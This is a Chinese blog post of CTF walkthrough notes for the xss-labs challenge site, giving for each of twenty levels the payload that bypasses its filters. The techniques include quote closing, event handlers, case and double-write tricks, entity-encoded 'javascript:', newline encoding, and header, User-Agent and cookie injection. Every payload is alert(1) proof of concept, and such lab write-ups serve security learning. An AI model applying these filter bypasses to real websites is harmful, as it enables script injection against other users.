xss挑战闯关笔记(一)

最新推荐文章于 2024-06-07 11:58:48 发布
最新推荐文章于 2024-06-07 11:58:48 发布
阅读量810 收藏 11
点赞数
分类专栏: web安全 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42111373/article/details/105999963
版权

一、在线靶场

http://test.ctf8.com

二、开始闯关

level1:首先第一关是个图片,观察url链接,发现有传参,直接把test替换成payload:<script>alert(1)</script>成功弹出
在这里插入图片描述
level2:此题考查参数闭合,一个搜索框,输入1,查看源代码,发现,1在两个双引号之间,那么我们只需要闭合前面一个引号,后面正常输入payload就可以绕过,payload为:"><script>alert(1)</script>

在这里插入图片描述
在这里插入图片描述
level3:此题考查符号被转义后的处理,看到此题发现和level2差不多,输入"><script>alert(1)</script>,打开源代码看到,<>都被转义了,双引号被过滤,存在单引号,可以尝试单引号闭合>被转义,所以用//闭合那么我们可以利用鼠标单击落下事件进行弹窗,payload为:' onmouseover=alert(1)//或者' onclick=alert(1)%0a
在这里插入图片描述
在这里插入图片描述
level4:和level3一样,只是从单引号变成了双引号,payload为: " onmouseover=alert(1)//或者" onclick=alert(1)%0a
在这里插入图片描述
在这里插入图片描述

level5:此题考查过滤关键词的绕过,这里过滤了script 转换成 scr_ipt、on转换成 o_n,这样就过滤了js事件,但好在没有过滤<>,我们可以用javascript来绕过,payload为:"><a href=javascript:alert(1)>
在这里插入图片描述
在这里插入图片描述
level6:和level5差不多,运用上一个的代码,发现href被过滤了,这里我们可以考虑大写或者双写绕过,实际发现只能大写绕过payload为:"><a hRef=javascript:alert(1)>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level7:发现script、href、on、src等都被置换为空,那么我们可以使用双写绕过,payload为:"><a hrhrefef=javascscriptript:alert(1)>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level8:此题考查伪协议绕过,script 转换成 scr_ipt、on 转换成 o_n、src 转换成 sr_c、data 转换成 da_ta、href 转换成 hr_ef、大小写失效、" 还被编码,但是尖括号<> ,单引号 ’ ,% ,# ,& 符号没有被过滤。直接伪协议,payload为:javascrip&#x74;:alert(1)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level9:和level8一样,只不过多了一个检测,如果发现没有带http:// 内容则会显示不合法,payload为:javascrip&#x74;:alert(1) // http:// 这里用//进行注释。
在这里插入图片描述
在这里插入图片描述
level10:此题考查隐藏框,看到页面发现没有框,尝试在url传参,发现也不行,然后f12大法发现有三个隐藏的框,把它们改为text,然后在最后一个写οnclick="alert(1),最后通过url传参keyword=test&t_sort=" type="text" onclick="alert(1),然后再点击那个框框即可弹窗
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level11:此题考查http头部xss注入,这里必须要用burp抓包了,参考payload:" onmouseover=alert(1) type="text" " οnclick=“alert(1) type=“text”,放包之后要点一下框即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level12:考查user-agent,参考payload:" onmouseover=alert(1) type="text" 或者” οnclick=“alert(1) type=“text”,放包之后要点一下框即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level13:考查cookie的xss注入,参考payload:" onmouseover=alert(1) type="text" 或者” οnclick="alert(1) type=“text”,放包之后要点一下框即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
level14:不会,参考https://www.hackersb.cn/hacker/140.html

level15:显示不出来

level16:禁止大小写绕过、script , / , (空格),等都被转换成&nbsp、即用%0d,%0a等绕过:

0a------换行符号------"\n"
0d------回车符号------"\r"

没有输出位置,直接在url上输入?keyword=接payload,payload为:<img%0Dsrc=1%0Donerror=alert(1)>或<iframe%0asrc=x%0donmouseover=alert1></iframe>或<svg%0aonload=alert1></svg>
在这里插入图片描述
level17,18:不会,百度的,参考:直接在embed标签插入onmouseover事件,payloadonmouseover=alert(1)
在这里插入图片描述
在这里插入图片描述
level19:知识盲区,百度的:flash xss,需要对flash的反编译对源码进行分析,payload为<a href="javascript:alert(1)">123</a>
在这里插入图片描述
在这里插入图片描述
level20:完全不会,这题是zeroclipboard.swf的xss,payload为:?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//%26width%26height
在这里插入图片描述

Deilty
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS挑战
crystal_shrimps的博客
09-02 981
写在前面 很早就知道这个平台,但以前是只点了收藏,并没有好好做过。这个周末突然想学习,就翻出来做了做,也是不容易…只要弹窗就算过,wp网上都有,这里记录下我用的payload 传送门:xss挑战 预备知识 实体编码 entity code HTML中<>"等字符是预留的,要想再HTML中输出这些字符就需要实体编码,比如空格「&nbsp;」,小于号「&lt;」,大于...
xss-labs通挑战xss challenge)
RuoLi_s的博客
01-16 2038
XSS-labs通挑战xss challenge) 0x00 xss-labs   最近在看xss,今天也就来做一下xss-labs通过挑战。找了好久的源码,终于被我给找到了,因为在GitHub上大家也知道那个下载速度,所以,我也就直接转接到自己的码云上去了,在这也贴出来,欢迎大家下载使用。   源码链接请点击:https://gitee.com/ruoli-s/xss-labs   安装没啥好说的,直接放进自己搭建好的www目录下,就可以开始了,xss-labs一共有level 20,做着看吧。
xss挑战
11-09
这个是XSS文件,解压后放在服务器的对应文件夹即可。 笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
最新发布
jayq1的博客
06-07 985
XSS
BuuCTF[第二章 web进阶]XSS
m_de_g的博客
07-27 5386
** [第二章 web进阶]XSS ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启模式,第一,一看这个URL就很奇怪没直接上手,二话没说成功下一 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现卡,是由level1,level2…,我
BUUCTF [第二章 web进阶]XSS
m0_49025459的博客
04-12 1922
题目 第一 这一没有过滤直接修改url就行 ?username=<script>alert('xss')</script> 第二 这一题样式没什么变化直接上源码 <html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套测试平台</title> <meta http-equiv="Content-Type"
xss小游戏.zip
02-25
这是一款利用xss漏洞的小游戏,无需连接数据库,共20,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS1.md
08-10
一些xss的payload
xss game挑战笔记.pdf
02-11
xss game挑战笔记
xss-labs挑战(一) 1
08-08
XSS-labs 挑战(一)1 的安装非常简单,只需要将源码下载下来,并将其放置在自己搭建好的 www 目录下,然后就可以开始了。 Level 1 无过滤机制 Level 1 是 XSS-labs 挑战(一)1 的第一个挑战。在这个挑战中,...
xss漏洞
cortanaji的博客
01-15 798
Xss的定义: XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 对JavaScriptalert()函数的使用,alert--弹出消息对话框,并且alert消息对话框通常用于一些对用户的提示信息。 Level 1 反射性 先找到输入点(test 4) 再找到输出点(t...
做了一个XSS游戏,攻略贴上来
yd0str
12-13 8743
游戏地址: http://xss-quiz.int21h.jp 第一:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
XSS-labs(1-10)详解
m0_46467017的博客
07-25 2778
通过查看可以知道本与上一的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
BUUCTF[第二章 web进阶]XSS
2301_78136321的博客
09-26 627
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6121
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
XSS 挑战
ST0new的博客
08-27 233
XSS 挑战@[TOC](XSS 挑战)前言挑战寻找类型是undefined的对象总结 前言 看到一篇有趣的帖子,是Gareth Heyes分享的一个有趣的xss 挑战,帖子的内容如下: <script> function solve(obj, property){ if(typeof obj === 'undefined') { obj[property].innerHTML = '<img src=1 onerror="alert(`You win`)">
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1335
xss挑战前十
CTF8-XSS 知识点:XSS,JavaScript
m0_51326092的博客
08-04 842
前言 今日心血来潮,把前几个星期发现的XSS拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!! 大佬博客: xss小游戏全通-答案 test.ctf8 xss注入解题记录 Web安全测试学习笔记 - XSS靶场 - test.ctf8.com HTML实体字符转换 在线编码网站 解题payload: level1:?name=<script>alert(1);</script> level2:?keyword=" οnc
[第二章 web进阶]XSS
qq_51558360的博客
03-04 1994
level1 ?username=<script>alert(1)</script> level2 查看源码 我们可以看到username被escape函数编码了,基本上就很难绕过。因此我们从username本身想办法。可以这样构造: ?username=';alert(1);// 这样username就是这样: var username = ‘’;alert(1);//’; 成功执行了alert(1)。 level3 输入上一的payload 题目源码,这次过滤了单引

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值